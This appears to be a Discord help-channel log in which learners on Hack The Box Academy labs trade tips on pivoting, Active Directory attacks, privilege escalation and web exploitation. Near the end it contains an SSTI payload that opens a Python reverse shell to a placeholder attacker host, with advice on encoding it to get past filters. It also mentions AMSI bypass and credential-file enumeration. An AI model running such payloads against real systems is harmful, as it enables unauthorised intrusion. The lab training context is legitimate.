#modules

The string in a file, should always say Negotiating

so, the humid of that space turns endevor

are you okay

you having a stroke

Hi guy, for AD enumeration, do the credentials captured by Inveigh dependent on what machine you run it in, assuming that the machines are in the same internal network?

PIVOTING, TUNNELING, AND PORT FORWARDING: Skills Assessment
Question:
Enumerate the internal network and discover another active host. Submit the IP address of that host as the answer.

What I have done
Accessed the wbeshell and found the username (mXXXX) and password and copied and pasted id_rsa(mget/get doesn't work) and done chmod 600 to it

When I 'ssh mXXXX@IP -i id_rsa' and put the password I can't log in the ssh

Can anyone help me? What I am doing wrong?

yes it can

Can you explain why?

cause its only listening to traffic, but if the traffic isnt being sent to the machine youre listening on youre not gunna hear anything

so it can vary depending on exactly why the traffic is being created in the first place

I see. Thanks

if your target are a docker container which use public ip then you can't scan or ping them but if your target are just local vm then some of them could have firewall enable which block icmp

No, it's local vm can't connect to rdp

i have been having rdp issues since yesterday too

even now i tried to rdp ... got it then after few seconds it fails on the pwnbox

It was working fine a few hours ago

this is for the Active Directory Enumeration & Attacks - Living Off the Land

I am on password attack pass the ticket

well no idea what to say ... i even rebooted my linux but from my vm it says failed then from pwnbox i got in but after a short while it fails

HTB been having some issue recently because of an back end hosting provider yeeted them self out so there was some issue for targets on both platform for the last few days

Nothing works for me

any idea when this would be likely resolved

if it's an back end issue there is nothing we can do

but i haven't got this issue so far

i have been stuck on the same section since yesterday

but y'all can do common stuff like make sure both your vpn and the pwnbox isn't on at the same time and changing vpn

linux privesc shell assessment last question. ran linux-exploit-suggester and tried a couple but no luck. primarily with no access to gcc ? any ideas?/hints?

if it persists later during the day then probably i will download a new vpn key

I change the VPN, reset the labs, nothing changed

I tried it too

again if it's an internal HTB issue there isn't anything much that we can do to fix this

i do remember there was an ssh key in that assessment but you should be able to find and use that user password for ssh

well i guess its time to go and touch grass until this is over

Found that also and used it
It says access denied

i guess ssh dynamic port forwarding is the easiest thing you can do for pivoting but if you got a shell you can just use that to continued pivoting

for the last flag you'll need to be the user that got the fourth flag

yeah in meterpreter with that atm @vital adder but f all commands can be used. trying to figure it out but just getting command not found constantly

pls don't tell me you are running your command in the meterpreter shell? 🤣

in the meterpreter shell run shell to drop into a linux shell on the target

or not sure if this will work but you can use shell -t for a pty shell

omfg

lol

i tried it before but maybe derped? i dunno but dropin into shell now ty

@limber river @iron plaza quick question did you guys use xfreerdp for rdping into the target machines? if yes then did you guys got this error? transport_check_fds: transport->ReceiveCallback() - -1

No, it seems like it's working now

i was wondering if that was the issue because that's an tls error and adding the /tls-seclevel:0 tag will fix it

edit: wait nope i don't think that's an tls error but not sure 🤷‍♂️

It works for seconds

i got this error on pwnbox:
`[03:37:44:505] [2627:2628] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 104: Connection reset by peer
[03:37:44:505] [2627:2628] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]

[03:37:44:505] [2627:2628] [ERROR][com.freerdp.core.transport] - NLA begin failed

[03:37:46:529] [2627:2628] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32

[03:37:46:529] [2627:2628] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32

[03:37:46:544] [2627:2628] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd

[03:37:46:544] [2627:2628] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx

[03:37:58:082] [2627:2628] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_SESSION_CONTINUE]

[03:38:11:916] [2627:2628] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 110: Connection timed out

[03:38:11:916] [2627:2628] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]

[03:38:11:916] [2627:2628] [INFO][com.freerdp.client.common] - Network disconnect!`

And turn down again

Are you sure it’s mXXXX

I had a different username

the pwnbox was working for me also your error is all over the place, an timeout, login, transport layer error

I found in webadmiin
||cat for-admin-eyes-only|| in this i found

thats what i got right after the log in

MY GOD
Where i am going..

yeah if the error is persistent for multiple user then most likely this is an internal error

we can't do anything , seems I will sleep early today lol

Oh yeah I understand now
You need to ssh as ||webadmin||, the credentials you found is for the next step and is not a user on the web server

well i woke up to this and now i am forced to go out

AHHHH...

Got confused again....

Thanks ..

it's good to take rest from time to time

i want to get over it cause i hate windows as an OS ... the longer i take the more hair i lose

I am connected now, hope it's not going down again

can someone please explain what's hapenning here ?

Lemme chech my notes

The hash you pass in as the user password is encrypted with aes256 , however the TGS Ticket Rubeus requested is encrypted in RC4 since its easier to crack

Its a pass the ticket no

Those are kerberoz keys

Nit passwords

And they are encrypted in aes 256 mod

But idk what is that in the output of the cmnd ysing rc4 reffer for

isn't asktgt module used to request tickets by passing in the user creds?

Can domeone explain

I took this screen from the section , the use aes to forge the ticket but rubeus output show rc4 ?

To forge a ticket using Rubeus, we can use the module asktgt with the username, domain, and hash which can be /rc4, /aes128, /aes256, or /des.

quoted from the section

from what I understand, the aes256 hash passed in is the password hash for user plaintext, used to request a ticket, and the password hashing algorithm has nothing to do with the Ticket hashing algorithm

also it won't pass the ticket unless /ptt is specified

idts , cuz the hash rc4 is the exact hash I found with the aes hash when I dump the hashes

so basically it's the same hash encoded with two different algorithm but why rebeus show rc4 in the output and we give it aes

i might know what u mean

I mean if the password hashing algorithm has nothing to do with ticket hashing why they use the same password one time with rc4 hash the other with aes

yah i tried runnning the command

maybe wait for others

Thank you

lol mb for the wrong answer

No, it"s all about discussing different ideas

thx

Hello everybody, im stuck in linux privilege escalation --> logrotate, i found the log file and im tring to execute the exploit but is stuck here Waiting for rotating /home/file.log

the file is diferent but i dont show it for server rules

Finally

I just got it thanks to your tip, thank you!

Now going to start the module which scares me the most
Windows Active Directory: The jumbo module

somebody could help with linux privilege escalation, logrotate?

Please im stuck here for 4 days

and then Active Directory Enumeration & Attacks :D

Yeah... 😆

Hi! Im in the ffuf module trying to do the lab but my vm network is crashing everytime I use ffuf

Any ideas why this is happening?

Probably your isp rate limiting

Hello somebody could help with linux privilege escalation, logrotate?

And what should I do to avoid that? The other day everything worked perfect but today I am trying by lan, wifi and connecting to my phone but everytime the vpn crashes throwing me the error “no route to host”

Well if it's a vpn issue, try switching from udp -> tcp vpn config

the main access point for main control access points were in the main access pointers were in the cordic central serever to save

Go home, you're drunk

Hi guys, Im doing the file upload section and I have a problem in the blacklist filter section. I get 403 Forbidden error on the file. is that ok or should I try something else

im stuck on it for days now lol

I used the upload function on all the php extensions. with the following body

you have a list of extensions right?

the one in seclists right ? @rustic sage

wtf what are u doing?

see the size of the responses

you are not fuzzing right

Why would you even need to fuzz this ? xD

do you did the module?

I tried to upload webshell file on in each of the extensions, then I requested it via /profile_images/ path.

ok i'll try to find my mistake

you have to look this

the lenght is the key

this sounds a bit ilegal....

It's not illegal at all

I'd explain why I said that

Lol

That’s a user my friend

ahh sorry

@tough fjord @burnt stone @spring tundra

It’s dealt with already

k sry

But you can ping SERIOUS RULE BREAK when something like that happens, at least that’s what I do

Yes, please do that next time ^

Now could somebody please help me with linux privesc, logrotate module?

Im stuck here for 4 days..

What are you stuck with? I’ve just completed it

i found the log file but when i try to execute the exploit i have this
Waiting for rotating /home/file.log

it never executes is waiting....

I’m going to PM you mate, 1 sec

Thanks bro!

Hello everyone, I need help on last two question of AD Enumeration & Attacks - Skills Assessment Part II
I got ||CT***|| cred and I knew that this user with GenericAll, I have tried to do port forward using chisel to use proxychains rdp and evil-winrm but it doesn't work
https://academy.hackthebox.com/module/143/section/1279

Hey, can someone help me with the last question on Active Directory Enumeration & Attacks, Section: Living Off the Land

what is the ip of the machine that you are trying to rdp?

what are you using to get the user?

Howdy

Hi, could someone help me, I am a bit stuck on "Active Directory Enumeration and Attacks - Privilege Access" - Q2: What host can this user access via WinRM? (just the computer name)

do you run bloodhound and the cyper query of the example?

I have run the query but I am not sure what the computer name is

the query give u only 1 result and is the name of the computer

if the name is example.inlanefreight.local the name of the computer will be "example"

when I put the name in that I get it says that it is the wrong name

what name are u puting?

I sent a private message

okay

can i dm you?

172.16.7.3

The worst thing in life:

Hey, can someone help me with the last question on Active Directory Enumeration & Attacks, Section: Living Off the Land

Ask your question more specific. No one can help you otherwise

yes sry, i got it

Good stuff

anyone else having an issue with boxes repeatedly going down?

trying to do the pivoting module but the spawned boxes continuously go down

had that issue since yesterday and it resolves time to time (gotta be on the lab at the right time sort of thing)... was told it is an internal issue that is being solved

yeah, im just unable to finish a question because i cannot proxy to a webserver in time before the machine just dies

mod :Active Subdomain Enumeration q : Find and submit the contents of the TXT record as the answer. did dig TXT inlanefreight.htb @10.129.91.90 not working any hints ?

Try to change the admin's email to 'flag@idor.htb', and you should get the flag on the 'edit profile' page.

go brute force subdomains. Use seclists, more than one

thats pain fs ok thanks tho

getting same results as it gave me previously with axfr

and non giving me the TXT record

In the Linux fundamentals Module section file system management. I have a problem.

Question: What is the size in GiB of the "/dev/VDA" Disk in our Pwnbox? (Format: 000)

When I run the command sudo fdisk -l the output is

160 is wrong. What do I wrong.

go through the dns section of the footprinting module again

how’d you format your answer?

"160" the format is "000" Is there a error???

i assume you didn’t put the quotation marks?

also be sure to remove the answer from this chat so you don’t spoil others

I only put the question makers to show my answer and the format.

With questions makers it's even wrong.

should be without

160 is wrong. I asked why? Forgot the question marks I only type in this place the question makers to show.

When cracking a NTLMv2 hash which part of the hash do i need ?

When the roaming disk goes suade, the files command another brick in the system

following the thread moreover

The last one

thanks for your help so i'm doing it right but i'm having issues with hashcat

but for some reason i'm getting this error massage in hashcat

why did you cut up the hash?

those fields are necessary

i tho i only need the last part of the hash

so input the entire hash

into text file

yes, you need the entire hash

thanks

The power-stations of the hash, and the codec numerics, are all faintly a square number in the map system.

so, the hash has commands for utlity problematics, and the sense of that is an illsit command.-

My bad sorry...

I just mixed up another thing

Cracked the hash????

script kiddies unite

would have been better to put the hash between spoiler tags 😅

We all do

It happens all the time

Eh

Just a skill issue

Writing on my own))

I didn't know that how to move the mouse is a skill , lol

Trust me... it is

400 dpi

== skill

You did not play CSGO?

Lmao no

That's great

Congratulations for not wasting 500+hours

Can someone help out with a question in the Intro to Network Traffic Analysis module? I've input the expected answer but it is not being accepted by the question form and neither are any of its variations 🙂

Hey, anyone have an idea why PowerSploit isn't importing all commands on Windows 11. The only commands getting imported by Get-Command -Module PowerSploit are: {Get-ComputerDetail, Get-HttpStatus, Invoke-ReverseDnsLookup}. Already bypassed AMSI and tried to move the module to the $env:PSModulePath

Systeminfo:

OS Name:                   Microsoft Windows 11 Pro
OS Version:                10.0.22000 N/A Build 22000
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          htb-student
```

Frustrating

I waste more in useless stuffs xD

LOL hahahah at least you are aware of that

Too late....

creds don't seem to work in the AD LDAP module for the LDAP overview section

BROKEN AUTHENTICATION: Using rockyou-50.txt as password wordlist and htbuser as the username, find the policy and filter out strings that don't respect it. What is the valid password for the htbuser account?
https://academy.hackthebox.com/module/80/section/777

||I already found the password list, but I can't seem to find a way to bypass rate-limiting. I tried looking for an option in wfuzz or ffuf that delays the request by n seconds but I couldn't find none. ||

Use the rate_limit_check.py

It comes with the module

@limber river dude sent you a dm if you dont mind

I used it but nothing showed up

So maybe you miss something in policies

I already solved the question by brute forcing the answer box manually but I wanna understand how to deal with rate limiting properly

the answer is already in the list found

I'll try it again and check if I missed something in the code

How many passwords did you get after applying the policies

15

I got 55

Lol

@acoustic owl any help

Please

What exactly is not working?

How he can brute force on the password after finding the customized wordlist

So either with a script, or manually, because after 3 or 4 attempts, the access is blocked for a few seconds.

He manage to do it manually

How It could be done, with script I can't remember what I have done

@acoustic owl I solved it manually but I couldn't do it with the script for some reason.

You can build your script to try a password every 20 or 30 seconds

Can I pm you?

In python you can use sleep

import time
time.sleep(20)

sure

I'll try that. thanks

should not I receive an icpm trace every minute?

its not working

i mean it works but what is wrong with my scheduled task then

which module and section are you on?

how can i copy a command in pwnbox?

INTRODUCTION TO WINDOWS COMMAND LINE / Working With Scheduled Tasks

wlep my note for that and a few more section in that module is F up for some reason so give me a sec i'll double check

either enable copy or there is a copy bubble that you can use when in full screen

oh thanks i didn't see the bubble

ok fixed

Logon Mode: Interactive/Background

so you need creds to create background scheduled tasks

i have a problem in Footprinting module, MYSSQL section when i run this script it says to debug it i don't know what to do

it's the same nmap scan as shown in the section i just changed the ip

do it?

use -d flag

i tried but i get nothing interesting just bunch of errors

thats what a debug consits of

yea i know

also the parameter should be mssql.instance-name

or is that a dash? i see a point let me open screenshot

maybe the instance name is not MSSQLSERVER?

it's a dot

sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.148.111

it would be weird but maybe you're right

i havent gone through that module but the syntax is correct

i'll try with metasploit if i can do the host enum

if you try to enumerate de instance name?

nmap -p 1433 --script ms-sql-info --script-args mssql.instance-port=1433 <host>

it just says host is up but nothing, i'll try something else later i've been doing this for too long

thanks

you’re to use the same command provided in the module

its not working

i did find the answer with metasploit anyway but nmap script doesn't work

got it with nmap 7.92

they changed something in nmap 7.93

yea i have the 7.93

yea i downgraded it in the pwnbox XD

sudo apt remove nmap --purge
sudo apt install nmap=7.92+dfsg1-2parrot1 nmap-common=7.92+dfsg1-2parrot1

maybe an erratum would be good?

yes

a 100%

i dit it

nice, we can go on now

https://github.com/nmap/nmap/issues/2622

this is the issue

update to 7.94 or downgrade to 7.92

nvm its not fixed in 7.94, but there are 2 workarounds:

1 https://github.com/nmap/nmap/issues/2572#issuecomment-14535275752

2 https://github.com/nmap/nmap/issues/2622#issuecomment-1490021783

Hey everyone, I'm new to the pentesting path and would love some help if anyone has time/interest. I'm a bit stuck on the nmap module's "Host and Port Scanning" section. The question I'm stuck on is asking to "Enumerate the hostname of your target and submit it as the answer (case-sensitive)".

I've scanned the target and found a few services responding but I'm coming up short with ideas on how to enumerate the hostname given a lack of a DNS server with useable PTR records. The module doesn't mention anything about hostname enumeration techniques so I did some digging online but haven't found anything to unblock me. I tried scanning the entire /24 to see if there might be another host on that subnet I could point nmap to for useable PTR records but only found my target host being up.

Is there an nmap script I'm not aware of I should be trying or some other tip to point me in the right direction? Everything I've found online says if you don't have a DNS server with a PTR record there's no magic nmap will provide to enumerate a hostname for you.

Thanks in advance to anyone that can help me out with pointers (not looking for answers unless the question is actually unsolvable in its current state...)

which OS is your target running? you can know it based on the TTL

if its asking about hostname i suppose its a Win machine

hostname can be found in protocols like SMB

when you say "found in protocols" how so?

I'm still really early in the course so the number of tools in my toolkit is currently quite limited 😅

you should follow the path recommendations

and do information security foundations path before

I'm following exactly the prescribed order of modules in the course

read the pentester path description

I got it sorted, thanks for the....stellar advice... @sly dome

no problem man

but i’d not go through Pentester Path without infosec foundations

It depends

the content is just too dense for a beginner

Beginner can mean different things in context too

I agree

👍🏽 😂

he will see in more advanced modules

I'd say if you've never had any experience with command line or Linux: infosec foundations definitely is a better start

But overall you need some foundation in networking some basic knowledge

Cmd

in my opinion the problematic OS is Windows

Shell

Exactly 🙃

Linux is 100x easier to understand xd

Me at this moment

HAHAHA

Are you

Doing the Pentest path

i have little experience in Pentesting and im learning things in the infosec foundations path

im doing the PayloadBunny track

infosec foundations-python-cbbh path-cpts path

Eh

Python isn't really needed tbh

im experienced at Python tho

Really but you need some foundation

just gonna do it for fun

its a short module

you need Python definitely por Pentesting imho

Python more if you're planning to do cbbh probably

Not really. Unless you're custom crafting scripts

i just want to know why cbbh befor cpts

web pentesting is huge

Cbbh expands more on some of the web techniques in the modules that can help

very powerful skill

I want to finish the cpts im already half way

any sql injection ive done is through a Python script

And ill go

For bouth exams

an scripting language is essential 🤷🏻‍♂️

hi guys im stuck on this last question in password attacks the last 6 days

mad to get over the slump. its the last question in pass the ticket i cant seem to log in as linux01 and get the flag in smb

first when importing the keytab file only use LINUX01$ without the @domain.htb and if you do it right when runing klist you should see linux01 ticket

*info

thanks il give it a shot now

Hi could anyone point out whats wrong in this?
ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:36515/ -H 'Host: FUZZ.academy.htb'

thank you kindly my good sir

if you add the docker target public ip without the port to your hosts file then nothing is wrong

also next time pls add what module and section you are doing, what you tried, what work or didn't work pls don't send your command without any context and ask what's wrong with it

At the latest when it comes to customizing scripts, probably even before (Broken Authentication) you will think about the Python module 😉

hey guys where i can download the wordlist for the modules

every time i have pain for this

now im doing the ```
File Inclusion

Page 4
PHP Filters

PHP Filters```
module and i cant find a wordlist for it

Hello everyone Im in windows Privesc module Communication with Processes when i use accesscheck works but insteadly i use it again and doesnt work, what is happen here?

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

\\.\Pipe\lsass
  Untrusted Mandatory Level [No-Write-Up]
  RW Everyone
        FILE_READ_ATTRIBUTES
        FILE_READ_DATA
        FILE_READ_EA
        FILE_WRITE_ATTRIBUTES
        FILE_WRITE_DATA
        FILE_WRITE_EA
        SYNCHRONIZE
        READ_CONTROL
  RW NT AUTHORITY\ANONYMOUS LOGON
        FILE_READ_ATTRIBUTES
        FILE_READ_DATA
        FILE_READ_EA
        FILE_WRITE_ATTRIBUTES
        FILE_WRITE_DATA
        FILE_WRITE_EA
        SYNCHRONIZE
        READ_CONTROL
  RW APPLICATION PACKAGE AUTHORITY\Your Windows credentials
        FILE_READ_ATTRIBUTES
        FILE_READ_DATA
        FILE_READ_EA
        FILE_WRITE_ATTRIBUTES
        FILE_WRITE_DATA
        FILE_WRITE_EA
        SYNCHRONIZE
        READ_CONTROL
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
PS C:\Users\htb-student\Desktop> .\access.exe /accepteula \\.\Pipe\lsass -v

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

\\.\Pipe\lsass
  Error getting security:
  All pipe instances are busy.
No matching objects found.

PS C:\Users\htb-student\Desktop>

can anyone help ?

<@&861185840277487616>

what

i want someone

please

@rustic sage read the #rules

what did i miss?

the user @rustic sage is asking for illegal questions

he whats to hack a discord account

my guess is when you run it the second time the LSASS process was in used by a different process or something along that

the classic but i mean if you are bored you can troll them for a bit

WTF how can i know if i can run accesschk?

accesschk itself is for checking the permission so you don't know when you can or can't run it, you have to run to know

there is for wordlist for you to download in the LFI module

but if there is wordlists for you to download in a module you can get it under Resources

what am doing wrong?

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

\\.\pipe\SQLLocal\SQLEXPRESS01
  Error getting security:
  All pipe instances are busy.
No matching objects found.

PS C:\Users\htb-student\Desktop>gci \\.\pipe\

    Directory: \\.\pipe\SQLLocal


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
------       12/31/1600   4:00 PM              3 SQLLocal\SQLEXPRESS01```

just my realized my educated guess kinda right because if you read the error it's All pipe instances are busy so maybe run it again 🤣

or try C:\Tools\AccessChk\accesschk.exe /accepteula \pipe\SQLLocal\SQLEXPRESS01 -v

got it!

my problem is in te path

is ```or try `C:\Tools\AccessChk\accesschk.exe /accepteula \pipe\SQLLocal\SQLEXPRESS01 -v``
and using
\.\pipe\SQLLocal\SQLEXPRESS01

i have a question for footprinting module in Oracle section, i found the answer ||but i'm curious why i can't use where to select only the user asked in the question : select name, password from sys.user$ where name=DBSNMP; it respond with invalid identifier||

do you try to use quotes?

i just tried and it doesn't work either

it’s case sensitive i think

where is the resources ?

there is no for the module that you're on but for the modules that have wordlist it's right here

nothing for me

where i can find a good wordlist ?

again there are no wordlist in your module

ye

it's depend on what you need

all wordlist show in any section 99% are on the pwnbox

or from the name you can just download it yourself

which section?

this one

i dont know how and why but it work if i do it in single quotes

use a common wordlist adding .php

the wordlist is directory-list-2.3-small.txt from SecLists, just read the example command

you need to fuzz with php extension

that's the File Inclusion module PHP Filters section, you sure you got the right module and section? or if you mean the very first command then that one for finding index.php 🤣 (they end up didn't ues the other one)

i am answering accordingly to this

🤦‍♂️ maybe i got something mixed on my end but dono 🤷‍♂️

edit: forgot the command in my note isn't on the example but you don't need to fuzz for extensions on this one

😅
im just a little bad to find wordlist

thanks

the newly landed spacials for text commands has an utility

so, the deducted verse has two or more scratch-volcubarity in the screen command files, as they shred to a new document address

so, the link has deduction

bro?

ther is a probleme with thius

the cred are worng

cant we still use other's userId to get privileges

Can someone please DM me for help with AD skills lab part 2, this is my third day on this and I'm going crazy

how can i reach the support

can you show us the exact command that you're running.

DM

I am on the medium password cracking lab and have gotten into a user account. I am having trouble with enumerating the root password. I see a second user that has bash history, but dont have that password. Any hints on where to look next?

if we are targeting an mssql server from linux we use sqsh

lowest hanging fruit is to see if you can cat /etc/shadow

odds are you can't, but that'll be the easiest way if you can

cant cat shadow

next thing to do is to look through config files for whatever services the box is running

I found root password in a box I did yesterday inside a php config file

I would honestly just go through standard priv esc stuff. Is this a linux box?

I assume so since you tried to cat /etc/shadow, but just wanna confirm

If it is, see if you can do sudo su with no password, do sudo -l (gives you a list of applications the current user has sudo permissions for)

do find / -perm u=s -type f 2>/dev/null

look for suid bit set

there's a whole slew of things to try!

just fun fact eu academy vpn permanently disconnect while na is working for me

incase anyone had similar issues

only root and who is in the "shadow" group can read the file

/etc/passwd

Sure, that should be checked too, although it’s a bit infrequent to find password hashes there

definitely, sorry I didn't follow from the beginning but if he can't read the "shadow" file probably doesn't have enough permissions

Mhm. Just checking it anyways. Gotta make sure to cross our ts and dot our is

Does anyone know if there is a known issue with the Reverse Shells module under Shells & Payloads course? Keeps disconnecting making it hard to trial and error the payload. 😦 I got the answer to the question, and luckily understand the concept. Just was hoping to connect and get it "proper".

on this some one said that i need to use windows auth

on impacket line, I used -wiindows-auth

but why it wasnt the thing with htbdbbuser

we connected normally

Can't recall why, but I'm pretty sure I researched it at the time.

Currently on attacking common services: SMTP. I've obtained creds for the user but I'm struggling to use them to get the users email messages and in turn the flag. All help appreciated

it is linux

I prefer to cross my eyes and dot my tees

yup still suckin at this. Tried linpeas, some other priv esc and now im looking to crack the other user's pass remotely with a mutated password list. Dunno

what's the output of find / -perm u=s -type f 2>/dev/null

i suggest to improve your fundamentals

@acoustic owl do you know why

https://cdn.discordapp.com/attachments/864986790347931648/1153778277887000626/happy_birthday----360P.mp4

https://tenor.com/view/epic-embed-fail-ryan-gosling-cereal-embed-failure-laugh-at-this-user-gif-20627924

Which module are we talking about?
Why other users claim anything, I can not judge, sorry

attacking common services sql

mssqlclient works better for me on that one than sqsh

you def dont have to use windows though

which module are you talking about?
AD Enum & Attack?

If I remember correctly, you found the user in the previous sections

forend should work

Hi, in SQLMAP - skills assessment, sqlmap returns a syntax error for any non trivial id value, no matter which tamper script I try.
Could I get some help ?

i can help, dm

is anyone knows,why when i do curl -x post ip -d key=text i get the flag,but when i do a request from the Burpsuite,i dont get the right flag,with exactly the same request?it returns me the text that returns without any data.But i put the data in the body,in the same type as i do with curl.Any tip?

show your burp request

i am here 90 minutes and i cant figure it out

is it something obvious?

i thought maybe with content-type but still couldnt figure it out

ur using : in burp and = with curl?

i fixed it

jesus this thing.i did a -vvv.Content-type:application/x-www-form-urlencoded was the right,it needed the application.Thanks for fast responses anyways! ❤️

was gonna say that

u can proxy your curl through burp and see the differences betweeen the request made by curl and the request you were trying to send

but anyways cheers it works now

still very very noob to these concepts,thats why i didnt think of it.thanks for the help

you try it if you want, add --proxy http://127.0.0.1:8080 to the end of the curl command you were using and watch Proxy -> HTTP History in Burp or just intercept, also np

thanks a lot

I need help

My machine won't spawn

The ovpn won't open on my vm

how can nmap make udp scan and in my know udp do not make any response unlike tcp

Nmap can make udp scans if you assign it the flag if that is your question. It ignores tcp

Wrong channel mate. Read #welcome

no i mean tcp ports if it get the syn packet it send syn-ack packet and my device will know the port is open

but in udp if get and packet do not send any response

so how nmap can make udp scan

It will do a 3 way handshake if I'm not mistaken for TCP

ok in udp what will do?

best diagram I can find

If it doesn't make sense, I would look more into it and understand. Especially if you are doing packet analysis in SOC or gov work

but how in my knowledge udp don get any response

Can someone help with the Command Injections module and bypassing blacklists?

yeah if the port doesnt respomd to the packet it mean that the port is open

UDP Probe: Nmap sends a UDP packet to each target port. For some common ports, the packet contains a protocol-specific payload that is likely to generate a response.

Open Port: No response is received.
Closed Port: An ICMP port unreachable error is received.

i wish its help

UDP does in fact get a response. Online games use UDP. When you lag, it’s because the client device hasn’t yet received a response from the server

It mean that the port is open

Ah, I was talking about udp as a protocol, not exclusive to nmap scand

My bad

Hello Everyone

Linux Fundamentals Module

Hi there! I need a little nudge on the Session Security - Skills Assessment module.

Update: Turns out I was doing almost the right thing all along and overcomplicating it.

cool

maybe you have to try something on the endpoint

where can i get walkthrough for OOPArtDB web challenge

read #welcome and #rules after that use /verify at #bot-commands and ask that at #challenges but there is no walkthrough or write up for active boxes or challenges

do you solve that box

that is not a box nor is this the right place to ask that

Hello everyone, i have i question, im in powershell/cmd session how can i know if i have administrative permissions?

One way would be to see if your current user is in the "administrators" group: net user <username> and check the "Local Group Memberships"

I doont see it

User name                    htb-student
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/10/2021 10:41:20 AM
Password expires             Never
Password changeable          6/10/2021 10:41:20 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   9/20/2023 2:22:09 AM

Logon hours allowed          All

Local Group Memberships      *Remote Desktop Users *Users
Global Group memberships     *None
The command completed successfully.

PS C:\Windows\system32>```

in local group membership put users, but not administrators, but i have administrator rights

to check you could even try to open an elevated prompt, if you are asking me if there is a precise way of doing it then we have to wait for someone else or google a bit

i have elevate prompt, my question is if how i can know this?

i use this but i have :False

if you execute net session what is the output?

```

System error 5 has occurred.

Access is denied.

PS C:\Windows\system32>```

can you go inside the administrator directory?

the first image is with elevated prompt, the second with normal prompt, i dont understand what is happening

I guess is the UAC

Path
----
C:\Users\Administrator


PS C:\Users\Administrator> dir
dir : Access to the path 'C:\Users\Administrator' is denied.
At line:1 char:1
+ dir
+ ~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\Administrator:String) [Get-ChildItem], UnauthorizedAccessExc
   eption
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

PS C:\Users\Administrator>```

can give me a explanaition, please?

https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/how-it-works

ahhhh

how can i know i have administator access token in my powershell session?

im executing this but notting happens

PS C:\>```

@rustic sage you don't have administrative privileges

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                              State
============================= ======================================== ========
SeTakeOwnershipPrivilege      Take ownership of files or other objects Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                 Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set           Disabled
PS C:\>


PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\>

Im the same user, first with elevated prompt, second with normal prompt, how can i know if im in elevated prompt?

WHAT IS HAPPENING HERE???

You don't have administrator privileges

Ok, but why in the first i have 3 privileges and the second i have 2? what is happening ?

@rustic sage it does not change anything bro use net user username to change if you have administrator access

look this

If you can't run powershell has administrator it means your account has no administrative privileges

i run it

and when i run it has admin i have 3 privileges when i run it normal i have 2

can i write you a message in private? @placid quest

Ok

Hi guys im on the Hard Password attaks assesment cant seem to get a handle on how to find davids credentials. any chance of a hand

I got in to rdp with johanna

Wait lemme chech my notes

U are on the rdp right

Try to enumerate everything in the target

Something useful

Its in front of you just keep looking

can i pm youy

WINDOWS EVENT LOGS & FINDING EVIL - Skills Assessment - any help please? i been stuck for a while now. i was not able to solve the first question.

Yeah sure

Hey everyone!
I have a question regarding SSTI "Exploitation Example 3":

Could anyone tell me why none of the reverse shells seem to work? I always get the error 500.

I have a hinch that I'm encoding it wrong, but don't know how to do it.
I already got the flag, but don't want to skip getting the rev shell too...

That's how I've encoded it

And this is the original payload:

{{''.__class__.__mro__[1].__subclasses__()[214]()._module.__builtins__['__import__']('os').popen('python -c \'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<PENTESTER_IP>",<PENTESTER_PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\'').read()}}

did you test RCE with a simpler payload

@sly dome Yeah, it works with single commands like "id" "ls" and so on. But I can't manage to get a rev shell. I also tried some bash rev shells instead of python and it also doesn't work

can you ping yourself?

if you can ping then try to check if tcp traffic is working, set up a Python http listener on your side and try to wget/curl it

if tcp traffic is working just keep trying shells, use base64 and in SSTI i like to url-encode ALL characters

Thanks for the tips! Both ping and tcp traffic is working, so I'll keep trying to encode the payload differently! Tried the all character encoding too already, but it didn't work unfortunately

quotes usually makes it difficult, use base64

https://www.revshells.com/

Hey RafaJurado, quick question about revshells website. If I want a shell to pop from a powershell to a powershell I'll have to select powershell down in the shell selector ?

@sly dome

use Nishang

and you will have to setup a listener on the other PS session

